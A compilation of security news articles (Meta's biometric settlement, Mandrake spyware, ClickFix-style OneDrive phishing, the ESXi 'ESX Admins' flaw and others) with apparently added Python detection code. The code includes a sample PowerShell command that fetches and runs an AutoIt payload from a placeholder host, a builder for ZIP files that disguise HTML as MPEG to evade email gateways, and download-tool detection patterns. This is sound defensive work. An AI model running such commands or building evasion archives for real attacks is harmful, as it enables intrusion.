Meta Settles for $1.4 Billion with Texas Over Illegal Biometric Data Collection
31.7.24
Social The Hacker News
Meta, the parent company of Facebook, Instagram, and WhatsApp, agreed to a
record $1.4 billion settlement with the U.S. state of Texas over allegations
that it illegally collected biometric data of millions of users without their
permission, marking one of the largest penalties levied by regulators against
the tech giant.
"This historic settlement demonstrates our commitment to standing up to the world's biggest technology companies and holding them accountable for breaking the law and violating Texans' privacy rights," Attorney General Ken Paxton said. "Any abuse of Texans' sensitive data will be met with the full force of the law."
The development arrived more than two years after the social media behemoth was sued for unlawfully capturing facial data belonging to Texans without their informed consent, as the law requires. The Menlo Park-based company, however, did not admit to any wrongdoing.
Tag Suggestions, as the feature was originally called when it was introduced in 2010, was marketed as a way for users to easily tag photos shared on Facebook with the names of people in them. However, it was enabled by default without giving adequate explanation as to how it worked.
The lawsuit accused Meta of violating the state's Capture or Use of Biometric Identifier (CUBI) Act and the Deceptive Trade Practices Act.
"Unbeknownst to most Texans, for more than a decade Meta ran facial recognition software on virtually every face contained in the photographs uploaded to Facebook, capturing records of the facial geometry of the people depicted," according to a press statement from the Attorney General's office.
"Meta did this despite knowing that CUBI forbids companies from capturing biometric identifiers of Texans, including records of face geometry, unless the business first informs the person and receives their consent to capture the biometric identifier."
In November 2021, Meta said it was discontinuing its "Face Recognition" system altogether and deleting a huge collection of more than a billion users' facial recognition templates as part of a wider initiative to limit the use of the technology across its products.
That same year, it agreed to pay a $650 million settlement in a 2015 class-action lawsuit in Illinois under the Biometric Information Privacy Act (BIPA) over similar allegations related to its face-tagging system.
Meta is not the only party being targeted by Texas over the collection of biometric data. The state also sued Google in October 2022 for allegedly violating the same biometric privacy law by gathering voice and facial data through products like Google Photos, Google Assistant, and Nest Hub Max. The case is currently underway.
New Mandrake Spyware Found in Google Play Store Apps After Two Years
31.7.24
Virus The Hacker News
A new iteration of a sophisticated Android spyware called Mandrake has been
discovered in five applications that were available for download from the Google
Play Store and remained undetected for two years.
The applications attracted a total of more than 32,000 installations before being pulled from the app storefront, Kaspersky said in a Monday write-up. A majority of the downloads originated from Canada, Germany, Italy, Mexico, Spain, Peru, and the U.K.
"The new samples included new layers of obfuscation and evasion techniques, such as moving malicious functionality to obfuscated native libraries, using certificate pinning for C2 communications, and performing a wide array of tests to check if Mandrake was running on a rooted device or in an emulated environment," researchers Tatyana Shishkova and Igor Golovin said.
Mandrake was first documented by Romanian cybersecurity vendor Bitdefender in May 2020, which described its deliberate approach of infecting only a handful of devices while managing to lurk in the shadows since 2016. The malware has yet to be attributed to a threat actor or group.
The updated variants are characterized by the use of OLLVM to conceal the main
functionality, while also incorporating an array of sandbox evasion and anti-analysis
techniques to prevent the code from being executed in environments operated by
malware analysts.
The list of apps containing Mandrake is below -
AirFS (com.airft.ftrnsfr)
Amber (com.shrp.sght)
Astro Explorer (com.astro.dscvr)
Brain Matrix (com.brnmth.mtrx)
CryptoPulsing (com.cryptopulsing.browser)
The apps pack three stages: a dropper that launches a loader, which in turn executes the core component of the malware after downloading and decrypting it from a command-and-control (C2) server.
The second-stage payload is also capable of collecting information about the device's connectivity status, installed applications, battery percentage, external IP address, and current Google Play version. Furthermore, it can wipe the core module and request permissions to draw overlays and run in the background.
The third stage supports additional commands to load a specific URL in a WebView and initiate a remote screen sharing session, as well as record the device screen, with the goal of stealing victims' credentials and dropping more malware.
"Android 13 introduced the 'Restricted Settings' feature, which prohibits sideloaded applications from directly requesting dangerous permissions," the researchers said. "To bypass this feature, Mandrake processes the installation with a 'session-based' package installer."
The Russian security company described Mandrake as an example of a dynamically evolving threat that's constantly refining its tradecraft to bypass defense mechanisms and evade detection.
"This highlights the threat actors' formidable skills, and also that stricter controls for applications before being published in the markets only translate into more sophisticated, harder-to-detect threats sneaking into official app marketplaces," it said.
When reached for comment, Google told The Hacker News that it's continuously shoring up Google Play Protect defenses as new malicious apps are flagged and that it's enhancing its capabilities to include live threat detection to tackle obfuscation and anti-evasion techniques.
"Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services," a Google spokesperson said. "Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play."
Cybercriminals Target Polish Businesses with Agent Tesla and Formbook Malware
31.7.24
Virus The Hacker News
Cybersecurity researchers have detailed widespread phishing campaigns targeting
small and medium-sized businesses (SMBs) in Poland during May 2024 that led to
the deployment of several malware families like Agent Tesla, Formbook, and
Remcos RAT.
Some of the other regions targeted by the campaigns include Italy and Romania, according to cybersecurity firm ESET.
"Attackers used previously compromised email accounts and company servers, not only to spread malicious emails but also to host malware and collect stolen data," ESET researcher Jakub Kaloč said in a report published today.
These campaigns, spread across nine waves, are notable for the use of a malware
loader called DBatLoader (aka ModiLoader and NatsoLoader) to deliver the final
payloads.
This, the Slovakian cybersecurity company said, marks a departure from previous attacks observed in the second half of 2023 that leveraged a cryptor-as-a-service (CaaS) offering dubbed AceCryptor to propagate Remcos RAT (aka Rescoms).
"During the second half of [2023], Rescoms became the most prevalent malware family packed by AceCryptor," ESET noted in March 2024. "Over half of these attempts happened in Poland, followed by Serbia, Spain, Bulgaria, and Slovakia."
The starting point of the attacks was phishing emails incorporating malware-laced RAR or ISO attachments that, upon opening, activated a multi-step process to download and launch the trojan.
In cases where an ISO file was attached, it would directly lead to the execution
of DBatLoader. The RAR archive, on the other hand, contained an obfuscated
Windows batch script enclosing a Base64-encoded ModiLoader executable that's
disguised as a PEM-encoded certificate revocation list.
A Delphi-based downloader, DBatLoader is primarily designed to download and launch the next stage malware from either Microsoft OneDrive or compromised servers belonging to legitimate companies.
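The "PEM-encoded certificate revocation list" disguise described above is easy to triage mechanically, because a real CRL body is DER (it begins with an ASN.1 SEQUENCE tag, 0x30) whereas a Windows executable begins with "MZ". The following Python is an added example written for this page, not ESET's tooling or anything from the campaign: it carves every PEM block out of a script, strips batch `echo` prefixes, Base64-decodes the body and reports whether the result is a PE. The batch script and the "payload" (a bare MZ/PE header) are constructed here for the demonstration.

```python
import base64
import binascii
import re

# Constructed sample in the shape ESET describes: a batch script that writes a
# bogus PEM "certificate revocation list" to disk and decodes it with certutil.
# The Base64 body wraps only a fake MZ/PE header, not a real loader.
FAKE_PE = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 20


def _pem_lines(blob):
    b64 = base64.b64encode(blob).decode("ascii")
    return [b64[i:i + 64] for i in range(0, len(b64), 64)]


SAMPLE_BAT = (
    "@echo off\r\n"
    "set c=%TEMP%\\update.crl\r\n"
    "(\r\n"
    "echo -----BEGIN X509 CRL-----\r\n"
    + "".join("echo " + line + "\r\n" for line in _pem_lines(FAKE_PE))
    + "echo -----END X509 CRL-----\r\n"
    ") > \"%c%\"\r\n"
    "certutil -decode \"%c%\" %TEMP%\\svc.exe\r\n"
)

# A genuine CRL body is DER: it starts with a SEQUENCE tag (0x30), never with "MZ".
BENIGN_CRL = (
    "-----BEGIN X509 CRL-----\n"
    + "\n".join(_pem_lines(b"\x30\x82\x01\x00" + b"\x02\x01\x01" + b"\x00" * 40))
    + "\n-----END X509 CRL-----\n"
)

PEM_BLOCK = re.compile(r"-----BEGIN ([A-Z0-9 ]+)-----(.*?)-----END \1-----", re.S)
ECHO_PREFIX = re.compile(r"(?m)^\s*echo\s+")


def carve_pem_payloads(text):
    """Yield (label, decoded_bytes) for each PEM block, tolerating batch 'echo' prefixes."""
    for m in PEM_BLOCK.finditer(text):
        body = ECHO_PREFIX.sub("", m.group(2))
        b64 = "".join(re.findall(r"[A-Za-z0-9+/=]+", body))
        try:
            yield m.group(1), base64.b64decode(b64)
        except binascii.Error:
            continue


def looks_like_pe(blob):
    """Cheap PE check: 'MZ' magic plus a 'PE\\0\\0' signature at e_lfanew (offset 0x3C)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage_script(text):
    """Summarise every PEM block: label, decoded size, PE or not, DER-shaped or not."""
    return [
        {"label": label, "size": len(blob), "is_pe": looks_like_pe(blob), "der_like": blob[:1] == b"\x30"}
        for label, blob in carve_pem_payloads(text)
    ]


if __name__ == "__main__":
    for finding in triage_script(SAMPLE_BAT) + triage_script(BENIGN_CRL):
        print(finding)
```

A PEM block whose decoded body is neither DER nor a PE is still worth a look: the `der_like` flag is only a quick sanity check, and attackers can prepend junk. The check is deliberately format-based rather than signature-based, so it also catches loaders other than ModiLoader that reuse the same disguise.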
Whichever of the three is deployed, Agent Tesla, Formbook, and Remcos RAT all come with capabilities to siphon sensitive information, allowing the threat actors to "prepare the ground for their next campaigns."
The development comes as Kaspersky revealed that SMBs are being increasingly targeted by cybercriminals owing to their lack of robust cybersecurity measures as well as limited resources and expertise.
"Trojan attacks remain the most common cyberthreat, which indicates that attackers continue to target SMBs and favor malware over unwanted software," the Russian security vendor said last month.
"Trojans are particularly dangerous because they mimic legitimate software, which makes them harder to detect and prevent. Their versatility and ability to bypass traditional security measures make them a prevalent and effective tool for cyber attackers."
New SideWinder Cyber Attacks Target Maritime Facilities in Multiple Countries
31.7.24
Cyber The Hacker News
The nation-state threat actor known as SideWinder has been attributed to a new
cyber espionage campaign targeting ports and maritime facilities in the Indian
Ocean and Mediterranean Sea.
The BlackBerry Research and Intelligence Team, which discovered the activity, said targets of the spear-phishing campaign include countries like Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and the Maldives.
SideWinder, which is also known by the names APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, and Razor Tiger, is assessed to be affiliated with India. It has been operational since 2012, often making use of spear-phishing as a vector to deliver malicious payloads that trigger the attack chains.
"SideWinder makes use of email spear-phishing, document exploitation and DLL side-loading techniques in an attempt to avoid detection and deliver targeted implants," the Canadian cybersecurity company said in an analysis published last week.
The latest set of attacks employ lures related to sexual harassment, employee
termination, and salary cuts in order to negatively impact the recipients'
emotional state and trick them into opening booby-trapped Microsoft Word
documents.
Once the decoy file is opened, it leverages a known security flaw (CVE-2017-0199) to establish contact with a malicious domain that masquerades as Pakistan's Directorate General Ports and Shipping ("reports.dgps-govtpk[.]com") to retrieve an RTF file.
The RTF document, in turn, downloads a document that exploits CVE-2017-11882,
another years-old security vulnerability in the Microsoft Office Equation
Editor, with the goal of executing shellcode that's responsible for launching
JavaScript code, but only after ensuring that the compromised system is
legitimate and is of interest to the threat actor.
It's currently not known what's delivered by means of the JavaScript malware, although the end goal is likely to be intelligence gathering based on prior campaigns mounted by SideWinder.
"The SideWinder threat actor continues to improve its infrastructure for targeting victims in new regions," BlackBerry said. "The steady evolution of its network infrastructure and delivery payloads suggests that SideWinder will continue its attacks in the foreseeable future."
The disclosure comes as a suspected Russian-linked threat actor is targeting entities interested in Indian political affairs with a Go-based remote access trojan (RAT) that's delivered via a .NET loader launched from Windows shortcut (LNK) files disguised as Office documents. The activity has been codenamed Operation ShadowCat.
OneDrive Phishing Scam Tricks Users into Running Malicious PowerShell Script
31.7.24
Phishing The Hacker News
Cybersecurity researchers are warning about a new phishing campaign that targets
Microsoft OneDrive users with the aim of executing a malicious PowerShell script.
"This campaign heavily relies on social engineering tactics to deceive users into executing a PowerShell script, thereby compromising their systems," Trellix security researcher Rafael Pena said in a Monday analysis.
The cybersecurity company is tracking the "crafty" phishing and downloader campaign under the name OneDrive Pastejacking.
The attack unfolds via an email containing an HTML file that, when opened, displays an image simulating a OneDrive page and includes an error message that says: "Failed to connect to the 'OneDrive' cloud service. To fix the error, you need to update the DNS cache manually."
The message also comes with two options, namely "How to fix" and "Details," with the latter directing the email recipient to a legitimate Microsoft Learn page on Troubleshooting DNS.
However, clicking "How to fix" prompts the user to follow a series of steps, which includes pressing "Windows Key + X" to open the Quick Link menu, launching the PowerShell terminal, and pasting a Base64-encoded command to supposedly fix the issue.
"The command [...] first runs ipconfig /flushdns, then creates a folder on the
C: drive named 'downloads,'" Pena explained. "Subsequently, it downloads an
archive file into this location, renames it, extracts its contents ('script.a3x'
and 'AutoIt3.exe'), and executes script.a3x using AutoIt3.exe."
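Because the victim pastes the command themselves, the useful telemetry is the process-creation record (Sysmon Event ID 1 or Security 4688) showing powershell.exe with a Base64 argument. The Python below is an added example for this page, not Trellix's code or the campaign's script: it peels the `-EncodedCommand` layer (UTF-16LE Base64) and an inline `FromBase64String('...')` layer, then scores the decoded text against the steps quoted above (DNS flush, a C:\downloads folder, an archive download and extraction, AutoIt3.exe running a .a3x script). The command lines, the placeholder URL and the indicator names are constructed for the example.

```python
import base64
import re

# Indicators drawn from the chain Trellix describes. Names are this example's own.
INDICATORS = {
    "flushdns": re.compile(r"ipconfig\s+/flushdns", re.I),
    "creates_c_downloads": re.compile(r"\b(?:mkdir|md|New-Item)\b[^;|\n]*c:\\downloads", re.I),
    "downloads_archive": re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadFile|Start-BitsTransfer", re.I),
    "extracts_archive": re.compile(r"Expand-Archive|ExtractToDirectory|\btar\s+-x", re.I),
    "autoit_runner": re.compile(r"AutoIt3\.exe|\.a3x\b", re.I),
}

# powershell -EncodedCommand (and its accepted abbreviations) takes Base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Inline decoding idiom: [Convert]::FromBase64String('...')
B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def encode_command(text):
    """Produce the Base64 form PowerShell expects for -EncodedCommand."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_blob(b64):
    raw = base64.b64decode(b64)
    # -EncodedCommand is always UTF-16LE; inline FromBase64String payloads are
    # usually UTF-8, so choose by the presence of NUL bytes.
    return raw.decode("utf-16-le" if b"\x00" in raw else "utf-8", errors="replace")


def triage_command_line(command_line):
    """Peel Base64 layers off a process command line and score it against INDICATORS."""
    text, layers = command_line, 0
    for pattern in (ENC_FLAG, B64_ARG):
        m = pattern.search(text)
        if m:
            text = decode_blob(m.group(1))
            layers += 1
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"decoded": text, "layers": layers, "hits": hits, "suspicious": len(hits) >= 3}


# Constructed sample of what a victim pastes; the URL is a placeholder, not a real C2.
PASTED = (
    "ipconfig /flushdns; "
    "mkdir C:\\downloads; "
    "Invoke-WebRequest -Uri 'http://update.example.invalid/pkg.bin' -OutFile C:\\downloads\\pkg.bin; "
    "Rename-Item C:\\downloads\\pkg.bin pkg.zip; "
    "Expand-Archive C:\\downloads\\pkg.zip -DestinationPath C:\\downloads; "
    "& C:\\downloads\\AutoIt3.exe C:\\downloads\\script.a3x"
)
# Constructed process-creation command lines (Sysmon Event ID 1 / Security 4688 CommandLine field).
SAMPLE_EVENT = "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + encode_command(PASTED)
BENIGN_EVENT = "powershell.exe -NoProfile -Command \"Get-Service -Name Dnscache\""
INNER = base64.b64encode(b"ipconfig /flushdns").decode("ascii")
NESTED_EVENT = "powershell.exe -enc " + encode_command(
    "$p=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('" + INNER + "')); iex $p"
)

if __name__ == "__main__":
    for line in (SAMPLE_EVENT, BENIGN_EVENT, NESTED_EVENT):
        print(triage_command_line(line))
```

The threshold of three indicators is a starting point, not a rule; in practice the strongest single signal is a user-launched powershell.exe whose parent is explorer.exe and whose argument is an encoded command, which is exactly what "press Windows+X, open PowerShell, paste" produces.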
The campaign has been observed targeting users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K.
The disclosure builds upon similar findings from ReliaQuest, Proofpoint, and McAfee Labs, indicating that phishing attacks employing this technique – also tracked as ClickFix – are becoming increasingly prevalent.
The development comes amid the discovery of a new email-based social engineering campaign distributing bogus Windows shortcut files that lead to the execution of malicious payloads hosted on Discord's Content Delivery Network (CDN) infrastructure.
Phishing campaigns have also been increasingly observed sending emails
containing links to Microsoft Office Forms from previously compromised
legitimate email accounts to entice targets into divulging their Microsoft 365
login credentials under the pretext of restoring their Outlook messages.
"Attackers create legitimate-looking forms on Microsoft Office Forms, embedding malicious links within the forms," Perception Point said. "These forms are then sent to targets en-masse via email under the guise of legitimate requests such as changing passwords or accessing important documents, mimicking trusted platforms and brands like Adobe or Microsoft SharePoint document viewer."
What's more, other attack waves have utilized invoice-themed lures to trick victims into sharing their credentials on phishing pages hosted on Cloudflare R2, which are then exfiltrated to the threat actor via a Telegram bot.
It's no surprise that adversaries are constantly on the lookout for different ways to stealthily smuggle malware past Secure Email Gateways (SEGs) so as to increase the likelihood of success of their attacks.
According to a recent report from Cofense, bad actors are abusing how SEGs scan ZIP archive attachments to deliver the Formbook information stealer by means of DBatLoader (aka ModiLoader and NatsoLoader).
Specifically, this involves passing off the HTML payload as an MPEG file to evade detection by taking advantage of the fact that many common archive extractors and SEGs parse the file header information but ignore the file footer that may contain more accurate information about the file format. In ZIP terms, the "header" is the per-entry local file header and the "footer" is the central directory at the end of the archive; the two carry independent copies of each entry's name, and a tool that trusts only one of them can be shown a different name from a tool that trusts the other.
"The threat actors utilized a .ZIP archive attachment and when the SEG scanned the file contents, the archive was detected as containing a .MPEG video file and was not blocked or filtered," the company noted.
"When this attachment was opened with common/popular archive extraction tools such as 7-Zip or Power ISO, it also appeared to contain a .MPEG video file, but it would not play. However, when the archive was opened in an Outlook client or via the Windows Explorer archive manager, the .MPEG file is (correctly) detected as being a .HTML [file]."
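The discrepancy Cofense describes can be reproduced and detected with a few dozen lines, and the check generalizes beyond the MPEG/HTML case to any archive whose two name tables disagree. The Python below is an added example written for this page, not Cofense's code or the actual attachment: it builds a stored ZIP whose local file header names the entry as an MPEG clip while the central directory names it as HTML, walks both structures independently, and reports the mismatch. It also shows that CPython's own `zipfile` module refuses to open such an entry, because `ZipFile.open()` compares the two names. The archive contents are inert constructed HTML.

```python
import io
import struct
import zipfile
import zlib

LOCAL_HDR = "<IHHHHHIIIHH"          # 30-byte local file header
CENTRAL_HDR = "<IHHHHHHIIIHHHHHII"   # 46-byte central directory record
EOCD = "<IHHHHIIH"                   # 22-byte end-of-central-directory record


def build_zip(entries):
    """Build a stored (uncompressed) ZIP. entries = [(local_name, central_name, data)].
    A normal archive has local_name == central_name; a mismatch reproduces the trick."""
    body, central = b"", b""
    for local_name, central_name, data in entries:
        crc = zlib.crc32(data) & 0xFFFFFFFF
        lname, cname = local_name.encode(), central_name.encode()
        offset = len(body)
        body += struct.pack(LOCAL_HDR, 0x04034B50, 20, 0, 0, 0, 0, crc, len(data), len(data), len(lname), 0) + lname + data
        central += struct.pack(CENTRAL_HDR, 0x02014B50, 20, 20, 0, 0, 0, 0, crc, len(data), len(data),
                               len(cname), 0, 0, 0, 0, 0, offset) + cname
    eocd = struct.pack(EOCD, 0x06054B50, 0, 0, len(entries), len(entries), len(central), len(body), 0)
    return body + central + eocd


def central_entries(blob):
    """(name, local_header_offset) for each central-directory record, read from the footer."""
    eocd_pos = blob.rfind(b"PK\x05\x06")
    if eocd_pos < 0:
        raise ValueError("no end-of-central-directory record")
    _, _, _, _, total, _, cd_offset, _ = struct.unpack_from(EOCD, blob, eocd_pos)
    entries, pos = [], cd_offset
    for _ in range(total):
        fields = struct.unpack_from(CENTRAL_HDR, blob, pos)
        if fields[0] != 0x02014B50:
            raise ValueError("bad central directory signature")
        nlen, elen, clen, offset = fields[10], fields[11], fields[12], fields[16]
        entries.append((blob[pos + 46:pos + 46 + nlen].decode("utf-8", "replace"), offset))
        pos += 46 + nlen + elen + clen
    return entries


def local_name_at(blob, offset):
    """Name as stated in the local file header, which a header-only scanner would trust."""
    fields = struct.unpack_from(LOCAL_HDR, blob, offset)
    if fields[0] != 0x04034B50:
        raise ValueError("bad local header signature")
    nlen = fields[9]
    return blob[offset + 30:offset + 30 + nlen].decode("utf-8", "replace")


def find_name_mismatches(blob):
    """Entries whose local-header name disagrees with the central-directory name."""
    return [
        {"local": local_name_at(blob, off), "central": cname}
        for cname, off in central_entries(blob)
        if local_name_at(blob, off) != cname
    ]


def python_zipfile_rejects(blob):
    """CPython's zipfile compares both names in open() and raises BadZipFile on a mismatch."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for info in zf.infolist():
                with zf.open(info) as f:
                    f.read()
        return False
    except zipfile.BadZipFile:
        return True


# Constructed samples: one entry announced as an MPEG clip in the local header and
# as an HTML file in the central directory, and one ordinary archive.
TRICK_ZIP = build_zip([("clip.mpeg", "page.html", b"<html><body>constructed sample</body></html>")])
CLEAN_ZIP = build_zip([("notes.txt", "notes.txt", b"nothing to see")])

if __name__ == "__main__":
    print(find_name_mismatches(TRICK_ZIP), python_zipfile_rejects(TRICK_ZIP))
    print(find_name_mismatches(CLEAN_ZIP), python_zipfile_rejects(CLEAN_ZIP))
```

An SEG rule built on this idea should quarantine on any mismatch rather than on the specific extension pair, and should additionally sniff the entry's content (an "MPEG" whose bytes begin with `<html` is wrong regardless of which name table is consulted). The walker above assumes entries without data descriptors (general-purpose flag bit 3 clear); archives that use them can only be walked reliably from the central directory, which is another reason to treat that structure as authoritative.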
VMware ESXi Flaw Exploited by Ransomware Groups for Admin Access
31.7.24
Ransom The Hacker News
A recently patched security flaw impacting VMware ESXi hypervisors has been
actively exploited by "several" ransomware groups to gain elevated permissions
and deploy file-encrypting malware.
The attacks involve the exploitation of CVE-2024-37085 (CVSS score: 6.8), an Active Directory integration authentication bypass that allows an attacker to obtain administrative access to the host.
"A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD," Broadcom-owned VMware noted in an advisory released in late June 2024.
In other words, escalating privileges on ESXi to administrator was as simple as creating a new AD group named "ESX Admins" and adding any user to it, or renaming any existing group in the domain to "ESX Admins" and either adding a user to it or using one of its existing members. Because the hypervisor keys on the group name alone, nothing on the ESXi side validates who created the group or when.
Microsoft, in a new analysis published on July 29, said it observed ransomware operators like Storm-0506, Storm-1175 (a China-based threat actor known for deploying Medusa ransomware), Octo Tempest, and Manatee Tempest leveraging the post-compromise technique to deploy Akira and Black Basta.
"VMware ESXi hypervisors joined to an Active Directory domain consider any
member of a domain group named 'ESX Admins' to have full administrative access
by default," researchers Danielle Kuznets Nohi, Edan Zwick, Meitar Pinto,
Charles-Edouard Bettan, and Vaibhav Deshmukh said.
"This group is not a built-in group in Active Directory and does not exist by default. ESXi hypervisors do not validate that such a group exists when the server is joined to a domain and still treats any members of a group with this name with full administrative access, even if the group did not originally exist."
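Since the hypervisor performs no validation, the place to catch this technique is the domain controller's Security log: the group has to be created or renamed, and a member has to be added, before ESXi will honour it. The Python below is an added example for this page, not Microsoft's hunting query or VMware's tooling. It runs over a handful of constructed event records (field names simplified from the Security log's SubjectUserName, TargetUserName, MemberName, OldTargetUserName and NewTargetUserName) using the standard event IDs for security-group creation (4727/4731/4754), member addition (4728/4732/4756) and account rename (4781), and rates a member addition that follows a creation or rename within an hour as high severity. The case- and whitespace-insensitive name match is a deliberately broad assumption so that lookalike names are not missed.

```python
from datetime import datetime, timedelta

# Standard Windows Security event IDs (domain controller audit log):
GROUP_CREATED = {4727, 4731, 4754}   # security-enabled global / local / universal group created
MEMBER_ADDED = {4728, 4732, 4756}    # member added to a security-enabled global / local / universal group
ACCOUNT_RENAMED = {4781}             # the name of an account was changed


def is_esx_admins(name):
    # ESXi matches the group by name. Normalising case and internal whitespace is a
    # deliberately broad assumption so that lookalike names are not missed.
    return " ".join((name or "").split()).casefold() == "esx admins"


def hunt_esx_admins(events, window=timedelta(hours=1)):
    """Flag creation/rename of a group named 'ESX Admins' and subsequent member additions.
    A member add within `window` of any creation/rename is rated high, otherwise medium."""
    alerts, creation_times = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        eid = ev["event_id"]
        if eid in GROUP_CREATED and is_esx_admins(ev.get("target")):
            alerts.append({"time": ev["time"], "kind": "group_created", "subject": ev["subject"],
                           "group": ev["target"], "severity": "high"})
            creation_times.append(ev["time"])
        elif eid in ACCOUNT_RENAMED and is_esx_admins(ev.get("new_name")):
            alerts.append({"time": ev["time"], "kind": "group_renamed", "subject": ev["subject"],
                           "group": ev["new_name"], "old_name": ev.get("old_name"), "severity": "high"})
            creation_times.append(ev["time"])
        elif eid in MEMBER_ADDED and is_esx_admins(ev.get("target")):
            recent = any(t <= ev["time"] <= t + window for t in creation_times)
            alerts.append({"time": ev["time"], "kind": "member_added", "subject": ev["subject"],
                           "group": ev["target"], "member": ev["member"],
                           "severity": "high" if recent else "medium"})
    return alerts


# Constructed sample events; account names and times are invented for the example.
T0 = datetime(2024, 7, 29, 10, 0)
SAMPLE_EVENTS = [
    {"time": T0, "event_id": 4727, "subject": "CORP\\jsmith", "target": "ESX Admins"},
    {"time": T0 + timedelta(minutes=3), "event_id": 4728, "subject": "CORP\\jsmith",
     "target": "ESX Admins", "member": "CORP\\svc-backup"},
    {"time": T0 + timedelta(minutes=10), "event_id": 4728, "subject": "CORP\\helpdesk",
     "target": "Domain Users", "member": "CORP\\newhire"},
    {"time": T0 + timedelta(hours=3), "event_id": 4781, "subject": "CORP\\mlee",
     "old_name": "Marketing", "new_name": "esx  admins"},
    {"time": T0 + timedelta(hours=5), "event_id": 4728, "subject": "CORP\\mlee",
     "target": "ESX Admins", "member": "CORP\\mlee"},
]

if __name__ == "__main__":
    for alert in hunt_esx_admins(SAMPLE_EVENTS):
        print(alert)
```

On the ESXi side, the name-to-admin mapping is governed by the advanced settings `Config.HostAgent.plugins.hostsvc.esxAdminsGroup` and `Config.HostAgent.plugins.hostsvc.esxAdminsGroupAutoAdd`; disabling the latter stops a group from being granted administrator rights purely on the strength of its name, which is worth doing on hosts that cannot be patched immediately (confirm the exact guidance against the Broadcom advisory for your version). Either way, the Security-log hunt above is the only control that tells you who created the group.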
In one attack staged by Storm-0506 against an unnamed engineering firm in North America, the threat actor weaponized the vulnerability to gain elevated permissions to the ESXi hypervisors after having obtained an initial foothold using a QakBot infection and exploiting another flaw in the Windows Common Log File System (CLFS) Driver (CVE-2023-28252, CVSS score: 7.8) for privilege escalation.
Subsequent phases entailed the deployment of Cobalt Strike and Pypykatz, a Python implementation of Mimikatz, to steal domain administrator credentials and move laterally across the network, followed by dropping the SystemBC implant for persistence and abusing the ESXi admin access to deploy Black Basta.
"The actor was also observed attempting to brute force Remote Desktop Protocol (RDP) connections to multiple devices as another method for lateral movement, and then again installing Cobalt Strike and SystemBC," the researchers said. "The threat actor then tried to tamper with Microsoft Defender Antivirus using various tools to avoid detection."
"It's important to note that exploitation is very dependent on the host having
been configured to use AD for user management," Scott Caveza, staff research
engineer at Tenable, said in a statement. "In addition, an attacker would also
need privileged access to the AD environment in order to successfully exploit
this vulnerability."
"Despite this significant barrier to entry, we cannot underestimate ransomware groups' abilities and determination to escalate privileges and advance their attack path once they obtain initial access."
The development comes as Google-owned Mandiant revealed that a financially motivated threat cluster called UNC4393 is using initial access obtained via a C/C++ backdoor codenamed ZLoader (aka DELoader, Terdot, or Silent Night) to deliver Black Basta, moving away from QakBot and DarkGate.
"UNC4393 has demonstrated a willingness to cooperate with multiple distribution clusters to complete its actions on objectives," the threat intelligence firm said. "This most recent surge of Silent Night activity, beginning earlier this year, has been primarily delivered via malvertising. This marked a notable shift away from phishing as UNC4393's only known means of initial access."
The attack sequence involves making use of the initial access to drop Cobalt Strike Beacon and a combination of custom and readily-available tools to conduct reconnaissance, not to mention relying on RDP and Server Message Block (SMB) for lateral movement. Persistence is achieved by means of SystemBC.
ZLoader, which resurfaced after a long gap late last year, has been under active development, with new variants of the malware being propagated via a PowerShell backdoor referred to as PowerDash, per recent findings from Walmart's cyber intelligence team.
Over the past few years, ransomware actors have demonstrated an appetite for latching onto novel techniques to maximize impact and evade detection, increasingly targeting ESXi hypervisors and taking advantage of newly disclosed security flaws in internet-facing servers to breach targets of interest.
Qilin (aka Agenda), for instance, was originally developed in the Go programming language, but has since been redeveloped using Rust, indicating a shift towards constructing malware using memory-safe languages. Recent attacks involving ransomware have been found to leverage known weaknesses in Fortinet and Veeam Backup & Replication software for initial access.
"The Qilin ransomware is capable of self-propagation across a local network," Group-IB said in a recent analysis, adding it's also equipped to "carry out self-distribution using VMware vCenter."
Another notable malware employed in Qilin ransomware attacks is a tool dubbed Killer Ultra that's designed to disable popular endpoint detection and response (EDR) software running on the infected host as well as clear all Windows event logs to remove all indicators of compromise.
Organizations are recommended to install the latest software updates, practice credential hygiene, enforce two-factor authentication, and take steps to safeguard critical assets using appropriate monitoring procedures and backup and recovery plans.
Critical Flaw in Acronis Cyber Infrastructure Exploited in the Wild
31.7.24
Vulnerability The Hacker News
Cybersecurity company Acronis is warning that a now-patched critical security
flaw impacting its Cyber Infrastructure (ACI) product has been exploited in the
wild.
The vulnerability, tracked as CVE-2023-45249 (CVSS score: 9.8), concerns a case of remote code execution that stems from the use of default passwords.
The flaw impacts the following versions of Acronis Cyber Infrastructure (ACI) -
< build 5.0.1-61
< build 5.1.1-71
< build 5.2.1-69
< build 5.3.1-53, and
< build 5.4.4-132
It has been addressed in versions 5.4 update 4.2, 5.2 update 1.3, 5.3 update
1.3, 5.0 update 1.4, and 5.1 update 1.2 released in late October 2023.
There are currently no details on how the vulnerability is being weaponized in
real-world cyber attacks and the identity of the threat actors that may be
exploiting it.
However, the Swiss-headquartered company acknowledged reports of active exploitation in an updated advisory last week. "This vulnerability is known to be exploited in the wild," it said.
Users of affected versions of ACI are recommended to update to the latest version to mitigate potential threats.
Update
